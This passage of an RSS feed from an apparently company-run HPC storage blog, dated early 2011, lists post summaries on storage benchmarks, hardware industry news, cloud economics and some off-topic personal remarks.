[root@jr5-2 ~]# dd of=/dev/null if=/data/big.file ... 1024+0 records in 1024+0 records out 137438953472 bytes (137 GB) copied, 29.</description>
    </item>
    
    <item>
      <title>Not all clouds have silver linings ...</title>
      <link>https://blog.scalability.org/2011/04/not-all-clouds-have-silver-linings/</link>
      <pubDate>Mon, 11 Apr 2011 16:40:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/04/not-all-clouds-have-silver-linings/</guid>
      <description>AaaS/StaaS (Archive as a service, Storage as a service) seems to have providers dropping their offerings as they are not very profitable. As with computing as a service, the issues are costs, pure and simple. For this to work well as a service, you, the provider, need your costs to be well below what you charge your customers. Moreover, the cost you charge your customers needs to be below their entire burdened costs for replicating the same thing in house.</description>
    </item>
    
    <item>
      <title>The TB sprint ... 12.4 TB/hour write speed</title>
      <link>https://blog.scalability.org/2011/04/the-tb-sprint-12-4-tbhour-write-speed/</link>
      <pubDate>Fri, 08 Apr 2011 14:29:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/04/the-tb-sprint-12-4-tbhour-write-speed/</guid>
      <description>We wanted to see what one of the current gen machines could do for writing and reading a 1TB (1000GB) sized file. So we set up a simple fio deck to do this. Then ran it.
Run status group 0 (all jobs): WRITE: io=999.78GB, aggrb=3535.7MB/s, minb=3620.6MB/s, maxb=3620.6MB/s, mint=289552msec, maxt=289552msec  The write took 289.6 seconds. Less than 5 minutes, or 12.4 TB/hour write speed. The read
Run status group 0 (all jobs): READ: io=999.</description>
    </item>
    
    <item>
      <title>Now thats what I&#39;m talking about ...</title>
      <link>https://blog.scalability.org/2011/04/now-thats-what-im-talking-about/</link>
      <pubDate>Thu, 07 Apr 2011 12:29:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/04/now-thats-what-im-talking-about/</guid>
      <description>New JackRabbit JR5 in lab (actually a pair of them) being built for a customer. Running some real simple baseline tests. Very simple stuff. RAID6. dd.
[root@jr5-1 ~]# dd if=/dev/zero of=/data/big.file ... 1250+0 records in 1250+0 records out 83886080000 bytes (84 GB) copied, 26.4774 seconds, 3.2 GB/s  and a quick-and-dirty fio run &amp;hellip;
Run status group 0 (all jobs): WRITE: io=128004MB, aggrb=3336.4MB/s, minb=3416.4MB/s, maxb=3416.4MB/s, mint=38367msec, maxt=38367msec  and the read version</description>
    </item>
    
    <item>
      <title>Day job at 2011 High Performance Computing Linux Financial Markets on Monday 4-April</title>
      <link>https://blog.scalability.org/2011/03/day-job-at-2011-high-performance-computing-linux-financial-markets-on-monday-4-april/</link>
      <pubDate>Thu, 31 Mar 2011 21:07:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/03/day-job-at-2011-high-performance-computing-linux-financial-markets-on-monday-4-april/</guid>
      <description>We will be there, with 2 machines in a booth with our partner JRTI/XCT. We are featuring Flash hardware from Virident and showing a demo (or set of demos) on very high performance data analysis using kdb+. Scalable gear will include a JackRabbit JR4 unit with 2x Virident TachIOn cards (think drool-worthy 1GB/s, 300k IOPS cards &amp;hellip; ). Everything in the JR4 is new, apart from the disks &amp;hellip; which are older/slower (what we had on hand).</description>
    </item>
    
    <item>
      <title>Pot ... kettle ... yeah, something like this</title>
      <link>https://blog.scalability.org/2011/03/pot-kettle-yeah-something-like-this/</link>
      <pubDate>Thu, 31 Mar 2011 12:06:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/03/pot-kettle-yeah-something-like-this/</guid>
      <description>I think this news story is a day early. It has all the requisite gems in it.
My gosh, for a moment, I thought Microsoft was talking about itself in the PC market. Then I saw the words &amp;ldquo;Google&amp;rdquo; and &amp;ldquo;e-book&amp;rdquo;. Now if we changed those to &amp;ldquo;Microsoft&amp;rdquo; and &amp;ldquo;PC&amp;rdquo;, yeah, that statement would also be true. Are we sure this isn&amp;rsquo;t the first of April?</description>
    </item>
    
    <item>
      <title>Something we are working on</title>
      <link>https://blog.scalability.org/2011/03/something-we-are-working-on/</link>
      <pubDate>Mon, 28 Mar 2011 21:26:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/03/something-we-are-working-on/</guid>
      <description>Ignore some of the ugly table bits to the left. Still working on the screen layout, menu look/feel, etc. But you can get a sense of what we are doing. This will appear at the HPC Linux on Wall Street show with us next week, as we will be running demos from this (and showing to a few prospective partners/customers at NAB in Las Vegas). Please feel free to stop by if you are in NYC for the show &amp;hellip; Many of the functions are not fully hooked to the controllers yet, but you will get the idea.</description>
    </item>
    
    <item>
      <title>Hilarious startup robot pitches a VC ...</title>
      <link>https://blog.scalability.org/2011/03/hilarious-startup-robot-pitches-a-vc/</link>
      <pubDate>Fri, 25 Mar 2011 14:36:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/03/hilarious-startup-robot-pitches-a-vc/</guid>
      <description>As seen on InsideHPC in a post
Ok &amp;hellip; a long time ago I posted a somewhat silly post, briefly lampooning the VC&amp;rsquo;s penchants for crowd-funding ideas that were buzzword heavy (and, ahem &amp;hellip; value-lite &amp;hellip; ahem), whilst ignoring real innovation, real markets, real companies. This video does a similar type of lampooning, and it is, sadly, on the money. If we were pitching the day job as a &amp;ldquo;Social network, and crowd source content and media data repository&amp;rdquo; rather than as a &amp;ldquo;high performance storage and computing solutions&amp;rdquo; company &amp;hellip; yeah &amp;hellip; chances are we&amp;rsquo;d get much more interest from that community.</description>
    </item>
    
    <item>
      <title>Oracle dumps Itanic</title>
      <link>https://blog.scalability.org/2011/03/oracle-dumps-itanic/</link>
      <pubDate>Thu, 24 Mar 2011 01:35:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/03/oracle-dumps-itanic/</guid>
      <description>You can sort of see this coming. Oracle is ditching Itanium development, effective immediately. If they haven&amp;rsquo;t done so for Power &amp;hellip; yet &amp;hellip; I&amp;rsquo;d expect this soon as well. Oracle&amp;rsquo;s claim is that Intel is ditching Itanium. Well, yeah, it&amp;rsquo;s sort of a weak argument. The future of Intel isn&amp;rsquo;t much on the Itanium side of things. x86 and derivatives appear to be their future, but Itanium isn&amp;rsquo;t being deep-sixed now.</description>
    </item>
    
    <item>
      <title>Parts shortages</title>
      <link>https://blog.scalability.org/2011/03/parts-shortages/</link>
      <pubDate>Thu, 24 Mar 2011 01:17:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/03/parts-shortages/</guid>
      <description>We&amp;rsquo;ve noticed this over the past week. Have a number of new orders, and suddenly, memory is hard to find. And prices have jumped dramatically. From /.
We do just-in-time builds, so we tend to keep inventory down. Global supply and demand, folks; the economy is operating as it should. When you have shortages, pricing rises through the channel to market. There is little we can do about this. We have some memory supply (the parts giving us issues now), and CPUs aren&amp;rsquo;t a problem.</description>
    </item>
    
    <item>
      <title>OT: Darned caffeine containment leak ...</title>
      <link>https://blog.scalability.org/2011/03/ot-darned-caffeine-containment-leak/</link>
      <pubDate>Wed, 23 Mar 2011 20:05:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/03/ot-darned-caffeine-containment-leak/</guid>
      <description>on my desk. Quick-thinking Doug managed to help me avoid a tragedy of epic proportions (completely covering my desk with coffee) by application of the caffeine leak containment device (e.g. towel). No pictures of this tragedy, and it was unrelated to any earthquakes. It was related to the klutz whose left hand was near the coffee and moved it like this &amp;hellip; D&amp;rsquo;OH!</description>
    </item>
    
    <item>
      <title>What should 432TB of storage cost?</title>
      <link>https://blog.scalability.org/2011/03/what-should-432tb-of-storage-cost/</link>
      <pubDate>Fri, 18 Mar 2011 20:19:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/03/what-should-432tb-of-storage-cost/</guid>
      <description>This is close to 1/2 PB. Assume you are building a very fast storage unit and backup system. What should this cost? Yeah, we can argue about cost per GB/s and cost per IOP/s. Assume 3GB/s, and 10k IOPS. Assume the unit is 144TB raw (108TB usable) primary fast storage, and 288TB raw (216TB usable) backup storage. There is a poll for this post, but you have to click the title to be able to participate.</description>
    </item>
    
    <item>
      <title>Day job PR on a new accelerated cluster at Stanford</title>
      <link>https://blog.scalability.org/2011/03/day-job-pr-on-a-new-accelerated-cluster-at-stanford/</link>
      <pubDate>Wed, 16 Mar 2011 16:02:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/03/day-job-pr-on-a-new-accelerated-cluster-at-stanford/</guid>
      <description>See InsideHPC for the scoop. PRWeb stuff here. Will have it up on our site soon. This uses the XCT chassis, which lets us use C20x0 Fermi units, as well as other PCIe cards (can you say Virident Flash?). The system will be using Bright Computing&amp;rsquo;s excellent Cluster Management tool. We will take pictures/movies during assembly and installation. Should be fun! About 15TF, 100x Fermi units, 96TB storage. Excellent design overall (pats himself on the back), and a major win for our partner JRTI and us, validating our strategic partnership.</description>
    </item>
    
    <item>
      <title>Not good</title>
      <link>https://blog.scalability.org/2011/03/not-good/</link>
      <pubDate>Sat, 12 Mar 2011 22:21:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/03/not-good/</guid>
      <description>The earthquake, tsunami and its after effects are terrible enough. Our thoughts are with the people of Japan (we have quite a few readers there). The US Red Cross has set up to take donations for relief work there if you are inclined to go that route. If you are in Japan, and have alternative suggestions as to how we all can help, please do post them. One of the after effects of this event was a destabilization of a boiling water reactor.</description>
    </item>
    
    <item>
      <title>Deskside box with lotsa GPUs</title>
      <link>https://blog.scalability.org/2011/03/deskside-box-with-lotsa-gpus/</link>
      <pubDate>Fri, 11 Mar 2011 20:28:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/03/deskside-box-with-lotsa-gpus/</guid>
      <description>Testing this for a partner. A Pegasus deskside supercomputer with 12x X5690 CPU cores, 48 GB RAM, a 500 MB/s IO channel (soon to be 1 GB/s), and a GTX 260 graphics card. Connected to an XCT a-Brix 2U unit with 4x NVidia Fermi C2050&amp;rsquo;s (normally we&amp;rsquo;d use a JackRabbit unit, but they are all busy with customer projects right now). First, let&amp;rsquo;s see what&amp;rsquo;s there:
[root@pegasus C]# lspci | grep nVidia | grep VGA 06:00.</description>
    </item>
    
    <item>
      <title>... and NetApp buys Engenio ...</title>
      <link>https://blog.scalability.org/2011/03/and-netapp-buys-engenio/</link>
      <pubDate>Thu, 10 Mar 2011 21:36:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/03/and-netapp-buys-engenio/</guid>
      <description>[updated] Ok, this one is huge. Many of the higher end storage folks in the HPC world use this hardware. Which NetApp will now own. NetApp is not an HPC storage vendor, and I don&amp;rsquo;t think they have designs to be one [update] yes they do! But this goes to Cray, SGI, Oracle, Dell, IBM, HP, and many others (DDN, Bluearc, Terascala, etc.) who do use Engenio. We don&amp;rsquo;t use it, so it&amp;rsquo;s really not an issue for us.</description>
    </item>
    
    <item>
      <title>when failures stick out like a statistical sore thumb</title>
      <link>https://blog.scalability.org/2011/03/when-failures-stick-out-like-a-statistical-sore-thumb/</link>
      <pubDate>Thu, 10 Mar 2011 16:43:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/03/when-failures-stick-out-like-a-statistical-sore-thumb/</guid>
      <description>Parts fail. Components fail. You have to operate assuming they will fail. A warranty is fundamentally a bet that parts will fail, and a willingness to place money (the price of the warranty) on that bet. Over time, with enough components, you get a feel for how often parts fail. You get historical data. When one subset of components has a high failure rate (e.g. Corsair SSD disks), you know you can isolate the problem.</description>
    </item>
    
    <item>
      <title>Single vs Multi-stream on JackRabbit JR5</title>
      <link>https://blog.scalability.org/2011/03/single-vs-multi-stream-on-jackrabbit-jr5/</link>
      <pubDate>Wed, 09 Mar 2011 21:53:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/03/single-vs-multi-stream-on-jackrabbit-jr5/</guid>
      <description>A customer was playing with one of our lab machines (a JackRabbit JR5), and asked us if we could improve the multithreaded streaming performance. The way we had it set up (for internal testing) was non-optimal for their use case. So we went back and did some simple tweaks, somewhat better optimized for their use case. Remember, this is our previous generation unit. Next gen is &amp;hellip; a little faster :)</description>
    </item>
    
    <item>
      <title>... and Hitachi GST is eaten by ... WD ...</title>
      <link>https://blog.scalability.org/2011/03/and-hitachi-gst-is-eaten-by-wd/</link>
      <pubDate>Mon, 07 Mar 2011 22:59:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/03/and-hitachi-gst-is-eaten-by-wd/</guid>
      <description>Hitachi, whose drives we do like, was just eaten by WD, whose drives we run away from. Story here. As long as the product lines that get ditched are the WD&amp;rsquo;s in favor of the Hitachi&amp;rsquo;s, I am ok with this. 2TB drives that decide to randomly power down in a RAID, without informing anyone? And a company that seems to want us all to believe that there are no firmware updates?</description>
    </item>
    
    <item>
      <title>BTW:  had an iPhone-ish meltdown</title>
      <link>https://blog.scalability.org/2011/03/btw-had-an-iphone-ish-meltdown/</link>
      <pubDate>Fri, 04 Mar 2011 22:04:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/03/btw-had-an-iphone-ish-meltdown/</guid>
      <description>took all my contact data with it &amp;hellip; so &amp;hellip; if you happen to want me to contact you, gotta give me some numbers to reach you at. Private email me at joe@scalability.org and I&amp;rsquo;ll re-enter it (and store it somewhere else). Yeah, mobile device backup? Pretty darned important? Me? A fool for not doing this regularly.</description>
    </item>
    
    <item>
      <title>I can&#39;t believe I forgot to update this</title>
      <link>https://blog.scalability.org/2011/03/i-cant-believe-i-forgot-to-update-this/</link>
      <pubDate>Fri, 04 Mar 2011 21:35:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/03/i-cant-believe-i-forgot-to-update-this/</guid>
      <description>Day job storage unit has increased density. JackRabbit JR2 tops out at 36TB now, JackRabbit JR3 tops out at 48TB, JackRabbit JR4 tops out at 72TB, and JackRabbit JR5 tops out at 144TB. 8 of the latter can go into a 42U rack, and get you 1.1PB of insanely fast storage. Our measured bandwidths are also quite good. JR4&amp;rsquo;s are demonstrating sustained 2+GB/s. JR5&amp;rsquo;s &amp;hellip; well :) DeltaV units have similar size specs.</description>
    </item>
    
    <item>
      <title>Quick accounting tool for Torque</title>
      <link>https://blog.scalability.org/2011/03/quick-accounting-tool-for-torque/</link>
      <pubDate>Thu, 03 Mar 2011 05:30:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/03/quick-accounting-tool-for-torque/</guid>
      <description>A long while ago, I had developed a usage summary tool for gridengine. For our small internal cluster, we are using Torque (we set it up just as the dejecta was hitting the high rotational rate elements w.r.t. gridengine at Oracle; the link URL may not be safe for work, and you might be offended by it &amp;hellip; if so, I apologize). This summary tool was a quick way to parse the accounting records.</description>
    </item>
    
    <item>
      <title>Members of Rocks core team moving to Rocks startup</title>
      <link>https://blog.scalability.org/2011/02/members-of-rocks-core-team-moving-to-rocks-startup/</link>
      <pubDate>Mon, 28 Feb 2011 19:43:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/02/members-of-rocks-core-team-moving-to-rocks-startup/</guid>
      <description>Rocks, as folks might know, is a cluster distribution based upon Redhat/Centos. This brings in all sorts of issues on its own, but Rocks attempts to work around this and knead the distribution and associated tools into a cogent form, for simple cluster setup. The core team consisted of the project lead, several developers and a number of others directly or loosely affiliated with the group. Two members, Dr. Greg Bruno and Mason Katz, just left to join Clustercorp, who make the commercial version, Rocks+.</description>
    </item>
    
    <item>
      <title>Plus ca change, plus c&#39;est la meme chose</title>
      <link>https://blog.scalability.org/2011/02/plus-a-change-plus-a-la-mentia/</link>
      <pubDate>Fri, 25 Feb 2011 06:11:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/02/plus-a-change-plus-a-la-mentia/</guid>
      <description>The more things change, the more they stay the same. My former employer (left on good terms, between layoffs a decade ago next month) SGI has layoffs coming. This is a tough environment folks, a very tough environment. We pulled out nearly 12% revenue growth in it. SGI posted a profit, but if you click through to the underlying article (hit InsideHPC first though), you see some interesting analysis. First, on the size of the layoff.</description>
    </item>
    
    <item>
      <title>The spork gains support</title>
      <link>https://blog.scalability.org/2011/02/the-spork-gains-support/</link>
      <pubDate>Thu, 24 Feb 2011 22:33:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/02/the-spork-gains-support/</guid>
      <description>This is goodness. Really. Peter Jones just sent out an email to the Lustre Discuss list, and it covers much of what I was hoping to see. Process ownership, agreement around the release for 2.1, a central tracker, and build info. Yeah, it&amp;rsquo;s probably not the optimal outcome, but it&amp;rsquo;s a better place than we were a week or more ago. And that was still better than a month or two ago.</description>
    </item>
    
    <item>
      <title>Interesting FUD floating about</title>
      <link>https://blog.scalability.org/2011/02/interesting-fud-floating-about/</link>
      <pubDate>Wed, 23 Feb 2011 23:29:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/02/interesting-fud-floating-about/</guid>
      <description>One of our competitors, having been recently purchased by a very large storage company, seems to be telling some customers that they replaced an infrastructure that we sold to a large supercomputer center in the northern midwest. Curious; I hadn&amp;rsquo;t heard of this. Last I checked (a few minutes ago), the infrastructure was still in use. Moreover, they said &amp;ldquo;they&amp;rdquo; replaced GlusterFS on the system. Again &amp;hellip; curious, as I don&amp;rsquo;t quite remember them on the con-calls.</description>
    </item>
    
    <item>
      <title>Cloudy expectations for HPC</title>
      <link>https://blog.scalability.org/2011/02/cloudy-expectations-for-hpc/</link>
      <pubDate>Tue, 22 Feb 2011 15:15:09 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/02/cloudy-expectations-for-hpc/</guid>
      <description>I&amp;rsquo;ve mentioned in the past where users&amp;rsquo; expectations deviated, often wildly, from the reality of a system. The reason for these deviations of expectations could be internal (convincing yourself that &amp;ldquo;instant&amp;rdquo; means, literally, &amp;ldquo;instant&amp;rdquo;), external (believing marketing blurbs), or some factor between the two. At HPCinthecloud, there is an article on a user running head first into the reality of cloud computing, and avoiding the hype. Ok, a number of critical take-aways. One is that end user expectations can be wildly &amp;hellip; badly &amp;hellip; out of sync with reality.</description>
    </item>
    
    <item>
      <title>We need to get better at weather forecasting</title>
      <link>https://blog.scalability.org/2011/02/we-need-to-get-better-at-weather-forecasting/</link>
      <pubDate>Mon, 21 Feb 2011 19:01:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/02/we-need-to-get-better-at-weather-forecasting/</guid>
      <description>Big HPC area. Yesterday, all the forecast models had us getting ~1.5 inches (about 4cm) of snow with rain/ice afterwards. We got (locally by me) 12+ inches (30+cm). Ok. I don&amp;rsquo;t mind if there are large error bars. Really I don&amp;rsquo;t. But this? I don&amp;rsquo;t know enough about the models to be able to say anything terribly intelligent about their intrinsic accuracy, or whether they omit anything, or under/over-predict anything &amp;hellip; I do know enough to say that they weren&amp;rsquo;t in the same ballpark as what we got.</description>
    </item>
    
    <item>
      <title>Need to look at MooseFS</title>
      <link>https://blog.scalability.org/2011/02/need-to-look-at-moosefs/</link>
      <pubDate>Mon, 21 Feb 2011 17:20:22 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/02/need-to-look-at-moosefs/</guid>
      <description>Looks similar to a number of others, but what&amp;rsquo;s interesting is that it keeps its metadata in RAM. How much of an impact that provides for updates depends upon the efficiency of the network stack, and how much security it provides depends upon its ability to recover from unplanned outages &amp;hellip; that is, it can&amp;rsquo;t just run in RAM and occasionally update something on disk. Gotta look at this more though, as it could be interesting as a front end FS to something else on the backend.</description>
    </item>
    
    <item>
      <title>Old model JackRabbit 5U bonnie&#43;&#43;</title>
      <link>https://blog.scalability.org/2011/02/old-model-jackrabbit-5u-bonnie/</link>
      <pubDate>Sat, 19 Feb 2011 18:24:52 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/02/old-model-jackrabbit-5u-bonnie/</guid>
      <description>Previous version of our JR5 unit, in the lab as a test bed for customers. Testing firmware and driver updates, among other things. Simple bonnie++ 1.96 run. You know I am not a huge fan of this as a load generator, or as a benchmark. Regardless, here is the output:
[root@jr5-lab ~]# bonnie++ -u root -d /data -s 144g:1024k -f Using uid:0, gid:0. Writing intelligently...done Rewriting... done Reading intelligently...done start &#39;em.</description>
    </item>
    
    <item>
      <title>RFPs that request a pony</title>
      <link>https://blog.scalability.org/2011/02/rfps-that-request-a-pony/</link>
      <pubDate>Thu, 17 Feb 2011 17:45:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/02/rfps-that-request-a-pony/</guid>
      <description>Yeah, I have one of those in front of me now. The requirements are, for all intents and purposes, impossible to simultaneously satisfy. The Q&amp;amp;A response from the customer suggests that they may be willing to compromise on some aspects, but not enough to actually satisfy their request. Sort of like &amp;ldquo;I want 1 PB &amp;hellip; for free, with free lifetime 24x7 support, &amp;hellip; , infinite bandwidth, infinite snapshots, infinite IOPs. And I want a pony.</description>
    </item>
    
    <item>
      <title>Pushing atoms versus pushing bits</title>
      <link>https://blog.scalability.org/2011/02/pushing-atoms-versus-pushing-bits/</link>
      <pubDate>Thu, 17 Feb 2011 06:48:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/02/pushing-atoms-versus-pushing-bits/</guid>
      <description>Cloud computing is driving a disruptive change through a number of market places. It started long before virtualization, but virtualization really enabled much of what we have now. Remember, at the end of the day, the entire process is economic in nature. Cost per cycle does matter. When a vendor sells hardware, they are selling all the cycles of that hardware over the usable lifetime of the hardware. They push the atoms at the customer, and let the customer manage the economics of utilization.</description>
    </item>
    
    <item>
      <title>Storage bandwidth wall writ large</title>
      <link>https://blog.scalability.org/2011/02/storage-bandwidth-wall-writ-large/</link>
      <pubDate>Tue, 15 Feb 2011 21:23:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/02/storage-bandwidth-wall-writ-large/</guid>
      <description>Henry Newman, CEO/CTO of Instrumental, has a great article on Enterprise Storage Forum. Remember, what we call the storage bandwidth wall, i.e. the time in seconds to read/write your disk, is your capacity divided by your bandwidth to read/write that capacity. It&amp;rsquo;s a height, measured in seconds, to take one pass through your data. If you can read/write at 1GB/s and have 1TB of data, your wall height is 1000GB/(1 GB/s) = 1000s.</description>
    </item>
    
    <item>
      <title>More code golf:  &#34;grid&#34; computing</title>
      <link>https://blog.scalability.org/2011/02/more-code-golf-grid-computing/</link>
      <pubDate>Mon, 14 Feb 2011 20:05:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/02/more-code-golf-grid-computing/</guid>
      <description>I told you I was an addict. Problem statement is here.
And you want to do it in the minimum number of characters (e.g. golf strokes) in your programming language. They give an example matrix, and their result (which is correct). So &amp;hellip; what can you do for this? I used two languages: Octave/Matlab and Perl. The former is more of a &amp;lsquo;modeling&amp;rsquo; language with formal programming bits atop it, and the latter is a classical programming language, quite notorious for its ability to be terse.</description>
    </item>
    
    <item>
      <title>JackRabbit updates for greater density</title>
      <link>https://blog.scalability.org/2011/02/jackrabbit-updates-for-greater-density/</link>
      <pubDate>Mon, 14 Feb 2011 16:23:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/02/jackrabbit-updates-for-greater-density/</guid>
      <description>JR4 units with up to 72 TB per 4U, at our nice sustained 2+ GB/s data rates. JR5 units with up to 144 TB per 5U at 2.5+ GB/s data rates. You can order our systems with these units. That&amp;rsquo;s 720TB/rack of JR4&amp;rsquo;s with 20+ GB/s sustained, or 1152TB per rack of JR5&amp;rsquo;s with 20 GB/s sustained. Built into our siCluster units, they represent some of the fastest and most cost effective hardware to build storage, storage clusters, storage clouds, and so on.</description>
    </item>
    
    <item>
      <title>Sometimes you get the bear ... other times, the bear gets you</title>
      <link>https://blog.scalability.org/2011/02/sometimes-you-get-the-bear-other-times-the-bear-gets-you/</link>
      <pubDate>Sat, 12 Feb 2011 16:28:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/02/sometimes-you-get-the-bear-other-times-the-bear-gets-you/</guid>
      <description>This took guts. The (new) CEO of Nokia noting that there are issues going forward. Nokia has had great handsets. I still recall, with great fondness, the E61 that I left in a taxi somewhere in London after visiting a customer &amp;hellip; But Nokia hasn&amp;rsquo;t innovated in a meaningful way, and hasn&amp;rsquo;t adapted well to the rapid change in market conditions. Like RIM, their phones are competent, excellent phones. Unlike Apple and Google/Android, their phones don&amp;rsquo;t have a great user experience.</description>
    </item>
    
    <item>
      <title>Physics humor for a Friday morning ...</title>
      <link>https://blog.scalability.org/2011/02/physics-humor-for-a-friday-morning/</link>
      <pubDate>Fri, 11 Feb 2011 15:37:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/02/physics-humor-for-a-friday-morning/</guid>
      <description>From xkcd Heh &amp;hellip; If you don&amp;rsquo;t know what a complex conjugate is, read this. Basically, if I have a function Ψ(x) which has a &amp;ldquo;real&amp;rdquo; part ψr(x) and an imaginary part ψi(x), with the ψ&amp;rsquo;s being real valued functions, so Ψ(x) = ψr(x) + i*ψi(x), then multiplying Ψ(x) by its complex conjugate (Ψ*(x) = ψr(x) - i*ψi(x), where i = √(-1)) yields:
(ψr(x) + i*ψi(x)) * (ψr(x) - i*ψi(x))</description>
    </item>
    
    <item>
      <title>I know I shouldn&#39;t be ... but I am ...</title>
      <link>https://blog.scalability.org/2011/02/i-know-i-shouldnt-be-but-i-am/</link>
      <pubDate>Thu, 10 Feb 2011 03:26:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/02/i-know-i-shouldnt-be-but-i-am/</guid>
      <description>[update] a bug in my reasoning (thanks Peter!) a Perl Golf addict. Not a recovering addict, but one that is active. What is Perl Golf? Well, as in real golf, you try to reach the solution in the minimal number of steps. In this case, you are to solve the specific puzzle. Detractors of Perl often make snarky comments about Perl&amp;rsquo;s equivalency to random line noise and other such nonsense. Sure &amp;hellip; if it makes you feel good to say that &amp;hellip; I am a fan of terse languages; I wrote programs (if you could call them that) in APL &amp;hellip; a while ago.</description>
    </item>
    
    <item>
      <title>fun with SCSI targets</title>
      <link>https://blog.scalability.org/2011/02/fun-with-a-scsi-target/</link>
      <pubDate>Wed, 09 Feb 2011 06:48:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/02/fun-with-a-scsi-target/</guid>
      <description>Had some fun today with our SCSI target. It&amp;rsquo;s a very nice system, very powerful. Not terribly easy to use. But it works well. We have tools we developed around it to make it easy to use. Creating iSCSI targets works nicely with our target code. It builds the target, sets up the infrastructure. Done with thin provisioning, it&amp;rsquo;s pretty fast and mostly painless. Well, it was, until we discovered that the stack, while including /etc/initiators.</description>
    </item>
    
    <item>
      <title>... and Lustre sporks ...</title>
      <link>https://blog.scalability.org/2011/02/and-lustre-sporks/</link>
      <pubDate>Wed, 09 Feb 2011 06:25:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/02/and-lustre-sporks/</guid>
      <description>A spork is a cross between a spoon and a fork. Of course there is a double entendre buried in there, as spoon (or spooning) implies a close relationship, and a fork (or forking) implies a split from an original. I think Lustre is sporking. Seriously. And this is a good thing for Lustre (as the major forces behind it are aligning, and still bending over backwards to avoid using the dreaded &amp;ldquo;f&amp;rdquo;-word).</description>
    </item>
    
    <item>
      <title>Semi-OT:  No ...  really ... no ...</title>
      <link>https://blog.scalability.org/2011/02/semi-ot-no-really-no/</link>
      <pubDate>Mon, 07 Feb 2011 20:07:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/02/semi-ot-no-really-no/</guid>
      <description>This is an economic thing. If I sell my house, in my suburban neighborhood, and I make a profit from that activity, should I be required to share my profit with my neighbors, who don&amp;rsquo;t own my house? The answer to this is, obviously not. If my business makes money, and makes a profit, should I be required to share my profit with others, who don&amp;rsquo;t own a portion of my business?</description>
    </item>
    
    <item>
      <title>And yet again ...</title>
      <link>https://blog.scalability.org/2011/02/and-yet-again/</link>
      <pubDate>Thu, 03 Feb 2011 21:52:23 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/02/and-yet-again/</guid>
      <description>Me: (presents A) &amp;ldquo;So what do you think?&amp;rdquo; Them: &amp;ldquo;Hmmm &amp;hellip; nice but what comes after A?&amp;rdquo; Me: &amp;ldquo;Let&amp;rsquo;s get another time slot and I&amp;rsquo;ll go over that&amp;rdquo; (time passes &amp;hellip; order of weeks) Me: (presents post-A) &amp;ldquo;So what do you think?&amp;rdquo; Them: &amp;ldquo;Hmmm &amp;hellip; nice but what comes after post-A?&amp;rdquo; Me: &amp;ldquo;Let&amp;rsquo;s get another time slot and I&amp;rsquo;ll go over that&amp;rdquo; (time passes &amp;hellip; order of several months; let&amp;rsquo;s call post-post-A &amp;ldquo;B&amp;rdquo;, and we hit important business milestones) Me: (presents B) &amp;ldquo;So what do you think?&amp;rdquo; Them: &amp;ldquo;Hmmm &amp;hellip; nice but what about A?</description>
    </item>
    
    <item>
      <title>OT: First good legislation of the year;  Get rid of the onerous 1099 stuff from Obamacare</title>
      <link>https://blog.scalability.org/2011/02/ot-first-good-legislation-of-the-year-get-rid-of-the-onerous-1099-stuff-from-obamacare/</link>
      <pubDate>Wed, 02 Feb 2011 23:27:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/02/ot-first-good-legislation-of-the-year-get-rid-of-the-onerous-1099-stuff-from-obamacare/</guid>
      <description>Looks like the amendment passed. This provision would have required that we keep records of every transaction above $600 in terms of 1099 forms. So if I go buy tickets for a business trip on LinkedIn, I have to fill out some 1099 bits (and so do they). If someone buys more than $600 of stuff from us, an exchange of 1099 info. Yeah. It was really dumb, and it shouldn&amp;rsquo;t have been in Obamacare.</description>
    </item>
    
    <item>
      <title>If you can&#39;t beat em, copy em ...</title>
      <link>https://blog.scalability.org/2011/02/if-you-cant-beat-em-copy-em/</link>
      <pubDate>Wed, 02 Feb 2011 16:46:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/02/if-you-cant-beat-em-copy-em/</guid>
